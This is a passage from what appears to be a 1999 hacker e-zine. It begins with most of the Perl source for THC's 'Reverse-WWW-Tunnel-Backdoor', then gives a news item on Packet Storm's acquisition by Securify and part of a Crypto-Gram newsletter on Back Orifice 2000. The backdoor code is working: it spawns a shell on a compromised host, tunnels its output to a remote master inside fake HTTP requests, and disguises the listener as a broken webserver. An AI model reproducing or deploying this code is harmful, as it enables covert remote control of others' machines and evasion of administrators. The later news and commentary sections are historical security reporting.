STDOUT "using \"-h\" as option : this help\n"; print STDOUT "any other option : slave mode\n"; exit(0); } else { print STDOUT "starting in slave mode\n"; $SLAVE_MODE = "yeah"; } } if (! $SLAVE_MODE) { &master; } else { &slave; } # END OF MAIN FUNCTION ############### SLAVE FUNCTION ############### sub slave { $pid = 0; if ($PROXY) { # setting the real config (for Proxy Support) $REAL_SERVER = $PROXY; $REAL_PORT = $PROXY_PORT; $REAL_PREFIX = "GET http://" . $SERVER . ":" . $LISTEN_PORT . $CGI_PREFIX; } else { $REAL_SERVER = $SERVER; $REAL_PORT = $LISTEN_PORT; $REAL_PREFIX = "GET " . $CGI_PREFIX; } AGAIN: if ($pid) { kill 9, $pid; } if ($TIME) { # wait until the specified $TIME $TIME =~ s/^0//; $TIME =~ s/:0/:/; (undef,$min,$hour,undef,undef,undef,undef,undef,undef) = localtime(time); $t=$hour . ":" . $min; while ($TIME ne $t) { sleep(28); # every 28 seconds we look at the watch (undef,$min,$hour,undef,undef,undef,undef,undef,undef) = localtime(time); $t=$hour . ":" .$min; } } if ($DAILY) { # if we must connect daily, we if (fork) { # we fork the daily shell process sleep(69); # to ensure the master control proc. goto AGAIN; # won't get stuck by a fucking cmd } # the user executed. } $address = inet_aton($REAL_SERVER) || die "can't resolve server\n"; $remote = sockaddr_in($REAL_PORT, $address); $forked = 0; GO: close(THC); socket(THC, &PF_INET, &SOCK_STREAM, $protocol) or die "can't create socket\n"; setsockopt(THC, SOL_SOCKET, SO_REUSEADDR, 1); if (! $forked) { # fork failed? fuck, let's try again pipe R_IN, W_IN; select W_IN; $|=1; pipe R_OUT, W_OUT; select W_OUT; $|=1; $pid = fork; if (! defined $pid) { close THC; close R_IN; close W_IN; close R_OUT; close W_OUT; goto GO; } $forked = 1; } if (! $pid) { # this is the child process (execs $SHELL) close R_OUT; close W_IN; close THC; open STDIN, "<&R_IN"; open STDOUT, ">&W_OUT"; open STDERR, ">&W_OUT"; exec $SHELL || print W_OUT "couldn't spawn $SHELL\n"; close R_IN; close W_OUT; exit(0); } else { # this is the parent (data control + network) close R_IN; sleep($DELAY); # we wait $DELAY for the commands to complete vec($rs, fileno(R_OUT), 1) = 1; select($r = $rs, undef, undef, 30); sleep(1); $output = ""; vec($ws, fileno(W_OUT), 1) = 1; while (select($w = $ws, undef, undef, 1)) { read R_OUT, $readout, 1 || last; $output = $output . $readout; } print W_OUT "\000" || goto END; while (1) { read R_OUT, $readout, 1 || last; last if ($readout eq "\000"); $output = $output . $readout; } &uuencode; # does the encoding of the shell output $encoded = $REAL_PREFIX . $encoded . "\n"; connect(THC, $remote) || goto END; # connect to master send (THC, $encoded, 0) || goto END; # and send data $input = ""; vec($rt, fileno(THC), 1) = 1; # wait until master sends reply while (! select($r = $rt, undef, undef, 0.00001)) {} while (1) { # read until EOD (End Of Data) recv (THC, $readin, 1, 0) || goto OK; goto OK if (($readin eq "\000") or ($readin eq "\n") or ($readin eq "")); $input = $input . $readin; } OK: $input =~ s/\n//gs; &uudecode; # decoding the data from the master goto END if ( $decoded =~ m/^$PASSWORD/s == 0); $decoded =~ s/^$PASSWORD//; print W_IN "$decoded" || goto END; # sending the data sleep(1); # to the shell proc. goto GO; } END: kill 9, $pid; $pid = 0; exit(0); } # END OF SLAVE FUNCTION ############### MASTER FUNCTION ############### sub master { socket(THC, &PF_INET, &SOCK_STREAM, $protocol) or die "can't create socket\n"; setsockopt(THC, SOL_SOCKET, SO_REUSEADDR, 1); bind(THC, sockaddr_in($LISTEN_PORT, INADDR_ANY)) || die "can't bind\n"; listen(THC, 3) || die "can't listen\n"; # print the HELP print STDOUT ' Welcome to the Reverse-WWW-Tunnel-Backdoor v1.4 by van Hauser / THC ... Introduction: Wait for your SLAVE to connect, examine it\'s output and then type in your commands to execute on SLAVE. You\'ll have to wait min. the set $DELAY seconds before you get the output and can execute the next stuff. Use ";" for multiple commands. Trying to execute interactive commands may give you headache so beware. Your SLAVE may hang until the daily connect try (if set - otherwise you lost). You also shouldn\'t try to view a binary data too ;-) "echo bla >> file", "cat >> file <<- EOF", sed etc. are your friends if you don\'t like using vi in a delayed line mode ;-) To exit this program on any time without doing harm to either MASTER or SLAVE just press Control-C. Now have fun. '; YOP: print STDOUT "\nWaiting for connect ..."; $remote=accept (S, THC) || goto YOP; # get the connection ($r_port, $r_slave)=sockaddr_in($remote); # and print the SLAVE $slave=gethostbyaddr($r_slave, AF_INET); # data. $slave="unresolved" if ($slave eq ""); print STDOUT " connect from $slave/".inet_ntoa($r_slave).":$r_port\n"; select S; $|=1; select STDOUT; $|=1; $input = ""; vec($socks, fileno(S), 1) = 1; while (1) { # read the data sent by the slave while (! select($r = $socks, undef, undef, 0.00001)) {} recv (S, $readin, 80, 0) || print STDOUT "disconnected\n"; $readin =~ s/\r//g; $input = $input . $readin; last if ( $input =~ m/\n\n/s ); } &hide_as_broken_webserver if ( $input =~ m/$CGI_PREFIX/s == 0 ); $input =~ s/^.*($CGI_PREFIX)\??//s; $input =~ s/\n.*$//s; &uudecode; # decoding the data from the slave &hide_as_broken_webserver if ( $decoded =~ m/^$PASSWORD/s == 0 ); $decoded =~ s/^$PASSWORD//s; $decoded = "[Warning! No output from remote!]\n>" if ($decoded eq ""); print STDOUT "$decoded"; # showing the slave output to the user $output = ; # and get his input. &uuencode; # encode the data for the slave send (S, $encoded, 0) || die "\nconnection lost!\n"; # and send it close (S); print STDOUT "sent.\n"; goto YOP; # wait for the next connect from the slave } # END OF MASTER FUNCTION ###################### MISC. FUNCTIONS ##################### sub uuencode { # does the encoding stuff for error-free data transfer via WWW $output = $PASSWORD . $output; # PW is for error checking and $uuencoded = pack "u", "$output"; # preventing sysadmins from $uuencoded =~ tr/'\n)=(:;&><,#$*%]!\@"`\\\-' # sending you weird /'zcadefghjklmnopqrstuv' # data. No real /; # security! $uuencoded =~ tr/"'"/'b'/; if ( ($PROXY) && ($SLAVE_MODE) ) {# a proxy drops the request if > 8kb $codelength = (length $uuencoded) + (length $REAL_PREFIX) +12; $cut_length = 4099 - (length $REAL_PREFIX); $uuencoded = pack "a$cut_length", $uuencoded if ($codelength > 4111); } $encoded = $uuencoded; $encoded = $encoded . " HTTP/1.0\n" if ($SLAVE_MODE); } # END OF UUENCODE FUNCTION sub uudecode { # does the decoding of the data stream $input =~ tr/'zcadefghjklmnopqrstuv' /'\n)=(:;&><,#$*%]!\@"`\\\-' /; $input =~ tr/'b'/"'"/; $decoded = unpack "u", "$input"; } # END OF UUDECODE FUNCTION sub hide_as_broken_webserver { # invalid request -> look like broken server send (S, "\n404 File Not Found\n". "\n

File Not Found

\n\n", 0); close S; print STDOUT "Warning! Illegal server access!\n"; # report to user goto YOP; } # END OF HIDE_AS_BROKEN_WEBSERVER FUNCTION # END OF PROGRAM # (c) 1998 by <--> ----[ EOF --- CUT HERE --- Ciao... van Hauser / THC - [The Hacker's Choice] THC's Webpage -> http://merlin.koeln-net.com/~plasmoid/thc Type Bits/KeyID Date User ID pub 2048/CDD6A571 1998/04/27 van Hauser / THC -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.3i mQENAzVE0A4AAAEIAOzKPhKBDFDyeTvMKQ1xx6781tEdIYgrkrsUEL6VoJ8H8CIU SeXDuCVu3JlMKITD6nPMFJ/DT0iKHgnHUZGdCQEk/b1YHUYOcig1DPGsg3WeTX7L XL1M4DwqDvPz5QUQ+U+VHuNOUzgxfcjhHsjJj2qorVZ/T5x4k3U960CMJ11eOVNC meD/+c6a2FfLZJG0sJ/kIZ9HUkY/dvXDInOJaalQc1mYjkvfcPsSzas4ddiXiDyc QcKX+HAXIdmT7bjq5+JS6yspnBvIZC55tB7ci2axTjwpkdzJBZIkCoBlWsDXNwyq s70Lo3H9dcaNt4ubz5OMVIvJHFMCEtIGS83WpXEABRG0J3ZhbiBIYXVzZXIgLyBU SEMgPHZoQHJlcHRpbGUucnVnLmFjLmJlPokAlQMFEDVE0D7Kb9wCOxiMfQEBvpAD /3UCDgJs1CNg/zpLhRuUBlYsZ1kimb9cbB/ufL1I4lYM5WMyw+YfGN0p02oY4pVn CQN6ca5OsqeXHWfn7LxBT3lXEPCckd+vb9LPPCzuDPS/zYnOkUXgUQdPo69B04dl C9C1YXcZjplYso2q3NYnuc0lu7WVD0qT52snNUDkd19ciQEVAwUQNUTQDhLSBkvN 1qVxAQGRTwgA05OmurXHVByFcvDaBRMhX6pKbTiVKh8HdJa8IdvuqHOcYFZ2L+xZ PAQy2WCqeakvss9Xn9I28/PQZ+6TmqWUmG0qgxe5MwkaXWxszKwRsQ8hH+bcppsZ 2/Q3BxSfPege4PPwFWsajnymsnmhdVvvrt69grzJDm+iMK0WR33+RvtgjUj+i22X lpt5hLHufDatQzukMu4R84M1tbGnUCNF0wICrU4U503yCA4DT/1eMoDXI0BQXmM/ Ygk9bO2Icy+lw1WPodrWmg4TJhdIgxuYlNLIu6TyqDYxjA/c525cBbdqwoE+YvUI o7CN/bJN0bKg1Y/BMTHEK3mpRLLWxVMRYw== =MdzX -----END PGP PUBLIC KEY BLOCK----- @HWA 08.0 PacketStorm Security Sells Out? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Who's going to pick up the slack now that Ken has removed himself from affiliation with Packet Storm? the following sounds well and good but will this company (Securify) have the same contacts and receive updates as frequently as Ken used to? I doubt it...well it looks like PSS will be relegated to being just an archive of old security tools and exploits hopefully the new system will at least do the old one some justice and preserve the layout meanwhile we wish Ken WIlliams the best of luck in his new job whatever that may be.... - Ed From HNN http://www.hackernews.com Packet Storm Moves to Kroll-O'Gara contributed by jkw As mentioned in the HNN rumors section last week Ken Williams has sold the rights to Packet Storm Security to Securify, the Information Security Group of The Kroll-O'Gara Company. Ken Williams will no longer be running the site and has accepted a different job within the Information Security industry. Securify hopes to have the site operational and online sometime in September. Old PSS - With Letter from Ken Williams and Securify Press Release New PSS http://www.securify.com/packetstorm/ Late Update Wow, this made it into the New York Times. NY Times - Registration Required http://www.nytimes.com/library/tech/99/08/biztech/articles/17secure.html August 17, 1999 Security Firm to Revive Computer-Defense Site By PETER WAYNER roll-O'Gara, the international security consulting firm, said Monday it would take over an Internet site that not only posted information about defending computer systems against attacks but also told how to break into them. In the shadowy world of hackers and crackers, it is often hard to tell the good guys from the bad. Computer-security experts frequently test systems by breaking into them, and the site, Packet Storm, posted descriptios of those break-ins. Kroll-O'Gara's computer security unit, Securify, which declined to discuss financial terms of its acquisition, said it planned to maintain the site's tradition of high-quality information as a way to market its services. But Kroll-O'Gara executives said that it would rid the site of its more contentious publications. "We see it, from a corporate standpoint, as somewhat risky and controversial," Charles Breed, Securify's vice president for marketing, acknowledged. "We'll be publishing a site with very powerful tools and they can be used for good or evil. Our opinion is that it's better to make knowledge available than keeping it obscure or hidden." Tommy Ward, a project manager at Securify, said three Securify employees would comb through the site, "sanitizing content." Until late June, Harvard University provided Packet Storm as a service and picked up the costs of answering requests for more than 10 gigabytes of data traffic a day. The site, which was edited by Ken Williams, a security consultant not associated with the university, proved popular with many computer experts because it collected detailed technical information about the methods intruders use to exploit weaknesses in computers. These often-fascinating narratives were mixed with discussions about how to help systems withstand assault. Harvard dropped the site in late June after the host of a rival site complained that Packet Storm had posted defamatory information. Joe Wrinn, a university spokesman, said, "We're happy that the site will be online again. That's the original reason we got involved." Williams called the site "a labor of love," but said it was taking 60 to 80 hours a week to maintain. He will not be associated with the site, which will be run by Securify employees at Securify.com. Since Harvard pulled the plug, the site has been inaccessible; computer professionals looked forward to its relaunch, expected in late September. "I'm glad that the compendium of information is going to be preserved," said Adam Shostack, a computer security consultant. -=- Here's the index.html file from the original location of PacketStorm Security with Ken's message and the Securify press release... -=- http://www.genocide2600.com/~tattooman/index.html To The Supporters of Packet Storm Security: As you may already be aware, there have been numerous rumors on the Net recently regarding the revival of Packet Storm Security through corporate sponsorship. I am pleased to announce that the rumours are indeed true, and that Packet Storm will now be hosted by Securify, the Information Security Group of Kroll-O'Gara. I have carefully considered the direction and future of PSS since it was taken down by Harvard, and have entertained innumerable offers from a wide variety of corporate, non-profit, and private entities to host the site. Kroll-O'Gara has presented me with the most impressive vision and plans for PSS. Not only does Kroll-O'Gara intend to preserve the original ideals and intent of PSS, but they have developed an exciting and definitive roadmap for the logical evolution of the site. Packet Storm Security had reached a stage where it was much more than a full time job for one person. For the last year I have been working a minimum of 60 hours a week to maintain the high quality of the site. In order to sustain my vision of PSS as *the* resource on the Internet for freeware Information Security tools, it became necessary to acquire the resources that only a dedicated corporate sponsor could provide. I have talked at length with Matt Barrie (PSS Program Manager) at Kroll-O'Gara ISG, and I believe that they have grand and noble goals for the future of Packet Storm Security. Unfortunately, I will not be with PSS in the future, however, because I have recently accepted an extremely enticing offer elsewhere in the Information Security industry. I do, nevertheless, give my strongest support to the new maintainers of the site, and I'm excited about what's in store for the future of PSS. To all of my valued friends and supporters of the site: I sincerely hope that you too will continue through your contributions and suggestions to help make Packet Storm what it was! Your support has been and will continue to be invaluable in ensuring that PSS is *the* resource for freeware Information Security tools. Respectfully, Ken Williams Founder Packet Storm Security ********** PRESS RELEASE ********** For more information, contact: Vicky Wu Charles Breed PR Manager VP of Marketing KVO Public Relations Securify, Kroll-O'Gara Company (650) 919-2027 (650) 812-9400 x107 vicky_ku@kvo.com cbreed@securify.com Matt Barrie matt@securify.com packetstorm@securify.com KROLL-O'GARA INFORMATION SECURITY GROUP ACQUIRES PACKET STORM, THE PREMIER WEB SITE FOR INFORMATION SECURITY TOOLS & DATA Packet Storm Security is positioned to be the Internet's largest single source for computer security threat information, tools and patches PALO ALTO, Calif., August, 17, 1999 In response to the growing demand for current and accurate information and tools on computer security, Securify, the Information Security Group of The Kroll-O'Gara Company (Nasdaq: KROG), announced today the acquisition of Packet Storm Security; a website created and maintained by Ken Williams, a renowned computer security expert. Averaging over 400,000 hits per day, generating over 7 gigabytes of traffic, Packet Storm Security is an established resource for many government agencies and major corporations. "Packet Storm Security provides a strong, long term Internet presence for Securify," states Dr. Taher Elgamal, President of Securify. "It is a state of the art resource for our customers and we see it as the nucleus for a number of exciting additional security management services." Packet Storm is one of the largest and most well recognized information security resources on the Internet today. The site consists of over 45,000 security related programs, such as up to date tools, patches, advisories, vulnerabilities. Considering this massive repository of information, Packet Storm Security is the ideal site for finding up-to-date information on the latest threats that face corporate networks and computer systems. This site has been frequented by system administrators, engineers, programmers, from organizations such as AT&T, DoD, NSA, FBI, IBM, Microsoft, GTE, ISS, KPMG, E&Y, InterNIC, Alcatel, NCSC, McAfee, NIST, USAF, Sprint CA, UK Govt., Mitre, Allied Signal, and CitiGroup bank. "Our customers have asked for a single source data point to inform and educate them on the ever increasing number of information security threats," states Jules Kroll, CEO and Chairman of Kroll-O'Gara Inc. "We will be dedicating a significant effort to making this site extremely useful for anyone involved with computer security." Packet Storm Security is in the process of being updated and refined prior to being posted in September at http://www.securify.com/packetstorm # # # About Securify, the Information Security Group of Kroll-O'Gara Securify, the Information Security Group of Kroll-O^Gara is composed of highly regarded industry experts that provide objective information security services to businesses and government agencies. These services include network and system security review and repair, product assessment, the creation and implementation of secure e-commerce sites, architecture and design. They also employ internally developed proprietary software that combines best-of-breed security tools and client information to analyze and assess network security issues as a scientific discipline. Their approach employs standard, well-tested methodology, and treats security as both a business and a technical issue. The Information Security Group is unique in the security field in that it not only provides the assessment and recommendations, but also actual implementation and deployment. For more information, please access their web site at www.securify.com, or contact the company at (650) 812-9400. Contact Vicki Wu of KVO Public Relations at (650) 919-2027. About The Kroll-O'Gara Company The Kroll-O'Gara Company is a leading global provider of a broad range of specialized products and services designed to supply solutions to a variety of security needs. Kroll-O'Gara provides governments, business, and individuals with information, analysis, training, and products to mitigate the growing risks associated with white-collar crimes, fraud, physical attacks, threats of violence, and uninformed decisions based upon incomplete or inaccurate information. The company is organized into four primary business groups: Investigations & Intelligence Group, Security Products & Services Group, Voice and Data Security Group, and the Information Security Group. Based in New York City, New York, and Fairfield, Ohio, Kroll-O'Gara employs more than 2,600 people in 60 offices and plants around the world. For more information, please access the company's web sites at www.securify.com or www.kroll-ogara.com. @HWA 09.0 CryptoGram Aug 15th '99 ~~~~~~~~~~~~~~~~~~~~~~~ From: Bruce Schneier CRYPTO-GRAM August 15, 1999 by Bruce Schneier Founder and CTO Counterpane Internet Security, Inc. schneier@counterpane.com http://www.counterpane.com A free monthly newsletter providing summaries, analyses, insights, and commentaries on cryptography and computer security. Back issues are available at http://www.counterpane.com. To subscribe or unsubscribe, see below. Copyright (c) 1999 by Bruce Schneier CRYPTO-GRAM now has over 20,000 subscribers! ** *** ***** ******* *********** ************* In this issue: Back Orifice 2000 Counterpane -- Featured Research News Counterpane Systems News NIST AES News The Doghouse: HPUX and the UNIX Crypt Algorithm Web-Based Encrypted E-Mail Comments from Readers ** *** ***** ******* *********** ************* Back Orifice 2000 Back Orifice is a free remote administration tool for Microsoft Windows. It's also one of the coolest hacking tools ever developed. Originally released last July, Back Orifice 2000 (BO2K) is the current release of the software. It works on Windows 95, Windows 98, and Windows NT. It is much better written than the original Back Orifice. And it's free, and open source. There are two parts: a client and a server. The server is installed on the target machine. The client, residing on another machine anywhere on the Internet, can now take control of the server. This is actually a legitimate requirement. Perfectly respectable programs, like pcAnywhere or Microsoft's own Systems Management Server (SMS), do the same thing. They allow a network administrator to remotely troubleshoot a computer. They allow a remote tech support person to diagnose problems. They are mandatory in many corporate computing environments. Remote administration tools also have a dark side. If the server is installed on a computer without the knowledge or consent of its owner, the client can effectively "own" the victim's PC. Back Orifice's difference is primarily marketing spin. Since it is not distributed by a respectable company, it cannot be trusted. Since it was written by hackers, it is evil. Since its malicious uses are talked about more, its benevolent uses are ignored. That's wrong; pcAnywhere is just as much an evil hacking tool as Back Orifice. Well, not exactly. Back Orifice was designed by a bunch of hackers with fun in mind. Not only can the client perform normal administration functions on the server's computer -- upload and download files, delete files, run programs, change configurations, take control of the keyboard and mouse, see whatever is on the server's screen -- but it can also do more subversive things: reboot the computer, display arbitrary dialog boxes, turn the microphone or camera on and off, capture keystrokes (and passwords). And there is an extensible plug-in language for others to write modules. (I'm waiting for someone to write a module that automatically sniffs for, and records, PGP private keys.) Back Orifice is also designed to hide itself from the server's owner. Unless the server's owner is knowledgeable (and suspicious), he will never know that Back Orifice is running on his computer. (Other remote administration tools, even SMS, also have stealth modes; Back Orifice is just better at it.) Anti-virus software has been updated to detect default Back Orifice configurations, but that will only solve most of the problem. Because Back Orifice is configurable, because it can be downloaded in source form and then recompiled to look different...I doubt that all variants will ever be discovered. Okay, so who's to blame here? The Cult of the Dead Cow wrote and released Back Orifice. Surely the world is not a safer place because, as CDC's Sir Dystic put it: "every 14-year-old who wants to be a hacker will try it." BO2K's slogan is "show some control," and many will take that imperative seriously. Back Orifice will be used by lots of unethical people to do all sorts of unethical things. And that's not good. On the other hand, Back Orifice can't do anything until the server portion is installed on some victim's computer. This means that the victim has to commit a security faux pas before anything else can happen. Not that this is very hard: lots of people network their computers to the Internet without adequate protection. An attacker can even ask the victim to install Back Orifice (social engineering might help); the Worm.ExploreZip worm of this spring did exactly that. Still, if the victim is sufficiently vigilant, he can never be attacked by Back Orifice. But what about Microsoft's computing environment? One of the reasons Back Orifice is so nasty is that Microsoft doesn't design its operating systems to be secure. It never has. Any program that runs in Microsoft Windows 95 and 98 can do anything. In Unix, an attacker would first have to get root privileges. Not in Windows. There's no such thing as limited privileges, or administrator privileges, or root privileges. Microsoft assumes that anyone who can run a program can reformat the hard drive. This might have made some sense in the age of isolated desktop computers; after all, if you could run a program, you were standing in front of the machine. But on the Internet, this is absurd. Windows NT was designed as a secure operating system, more or less. There are provisions to make Windows NT a very secure operating system, such as privilege levels in separate user accounts, file permissions, and kernel object access control lists. However, the configuration that makes Windows NT secure is very very far and distant from the default installed configuration. Microsoft admits this. You have to make 300+ security checks and modifications to Windows NT to make it secure in its default configuration. And on top of this, Microsoft assumes that most users have Administrator access to their desktop machines anyway. They only really worry about network security, not host-end security, which is where they are seriously vulnerable to attacks like Back Orifice 2000. Windows NT could be secure, but Microsoft refuses to ship the OS in that condition (presumably they worry that their spiffy animated fading menu bars may be overlooked). Malicious remote administration tools are a major security risk. What Back Orifice has done is made mainstream computer users aware of the danger. Maybe the world would have been safer had they not demonstrated the danger so graphically, but I am not sure. There are certainly other similar tools in the hacker world -- one, called BackDoor-G, has recently been discovered -- some developed with much more sinister purposes in mind. And Microsoft only responds to security threats if they are demonstrated. Explain the threat in an academic paper and Microsoft denies it; release a hacking tool like Back Orifice, and suddenly they take the vulnerability seriously. Back Orifice Home Page: http://www.bo2k.com/ Commentary: http://www.zdnet.com/zdnn/stories/news/0,4586,2127049,00.html http://www.infoworld.com/cgi-bin/displayArchive.pl?/99/30/o03-30.36.htm Microsoft's Systems Management Server: http://www.microsoft.com/smsmgmt/techdetails/remote.asp http://www.cultdeadcow.com/news/pr19990719.html BackDoor-G: http://www.zdnet.com/zdnn/stories/news/0,4586,2267379,00.html ** *** ***** ******* *********** ************* Counterpane -- Featured Research "Notes on the Design and Analysis of the Yarrow Cryptographic Pseudorandom Number Generator" J. Kelsey, B. Schneier, and N. Ferguson, Sixth Annual Workshop on Selected Areas in Cryptography, Springer Verlag, August 1999, to appear. We describe the design of Yarrow, a family of cryptographic pseudo-random number generators (PRNG). We describe the concept of a PRNG as a separate cryptographic primitive, and the design principles used to develop Yarrow. We then discuss the ways that PRNGs can fail in practice, which motivates our discussion of the components of Yarrow and how they make Yarrow secure. Next, we define a specific instance of a PRNG in the Yarrow family that makes use of available technology today. http://www.counterpane.com/yarrow-notes.html ** *** ***** ******* *********** ************* News Major irony alert: President Clinton signs a bill into law using PGP. http://www.wired.com/news/news/politics/story/20775.html A new U.K. bill on e-commerce has the nasty provision that police will be able to demand access to encryption keys if they suspect criminal use of the Internet. Those who refuse get a two-year prison sentence. http://www.wired.com/news/news/politics/story/20937.html http://techweb.com/news/story/TWB19990726S0010 Text of the bill: http://www.dti.gov.uk/cii/elec/ecbill.html Foundation for Internet Policy Research commentary on the bill: http://www.fipr.org/ecommpr.html The first three chapters of Alan Turing's treatise on the Enigma, retyped from the only known paper copy, are available at: http://home.cern.ch/~frode/crypto/Turing/index.html The L0pht has released an anti-sniffer tool. It detects sniffers on networks. Unfortunately, at least one sniffer-detection-resistant sniffer has been released. And the race continues.... http://www.wired.com/news/news/technology/story/20913.html L0pht: http://www.l0pht.com/ The Information Society, an academic journal, published a special issue on anonymity and the Internet: vol. 15, no. 2. Actually, there are interesting articles in most of the back issues. http://www.slis.indiana.edu/TIS/tables_of_contents/toc.html The Encrypting File System (EFS) built into Microsoft Windows 2000 has been broken. http://www.ntsecurity.net/forums/2cents/news.asp?IDF=118&TB=news Microsoft claims that it has not, that the attack is predicated on the user doing something wrong: leaving the EFS recovery key on the machine. http://www.microsoft.com/security/bulletins/win2kefs.asp The author's reply: http://www.ntsecurity.net/forums/2cents/GetMessage.asp?RootID=2092&ID=2102&I DF=118&TB=news I reserve judgment, not having studied EFS, the attack, or Microsoft's response. In late May, Janet Reno wrote to German Federal Secretary of Justice Herta Daubler-Gmelin, asking him to control the distribution of encryption software over the Internet. http://www.heise.de/tp/deutsch/inhalt/te/5117/2.html There's another version of Melissa floating around. This one uses the ".all" extensions in Microsoft Outlook to crash systems. Clever idea, actually. http://www.computerworld.com/home/print.nsf/all/990719B50A This rather impressive espionage device is being sold as a home consumer item: http://www.x10.com/home/offer.cgi?!ZDX30,../1index761.htm There has been considerable hoo-hah over a U.S. government plan to monitor private networks for intrusion, and invade a lot of privacy in the process. (This will all be at the consent of the various companies, so warrants are not required.) It's called Fidnet, for Federal Intrusion Detection Network. http://www12.nytimes.com/library/tech/99/07/biztech/articles/28compute.html http://www.zdnet.com/zdnn/stories/news/0,4586,2304083,00.html?chkpt=hpqs014 http://www.sjmercury.com/svtech/news/indepth/docs/secure072999.htm http://techweb.com/wire/story/TWB19990729S0013 http://www.fcw.com/pubs/fcw/1999/0726/web-plan-7-29-99.html http://www.infoworld.com/cgi-bin/displayStory.pl?990730.enstarwars.htm EPIC's "Critical Infrastructure Protection and the Endangerment of Civil Liberties" http://www.epic.org/security/infowar/epic-cip.html Copy of the White House p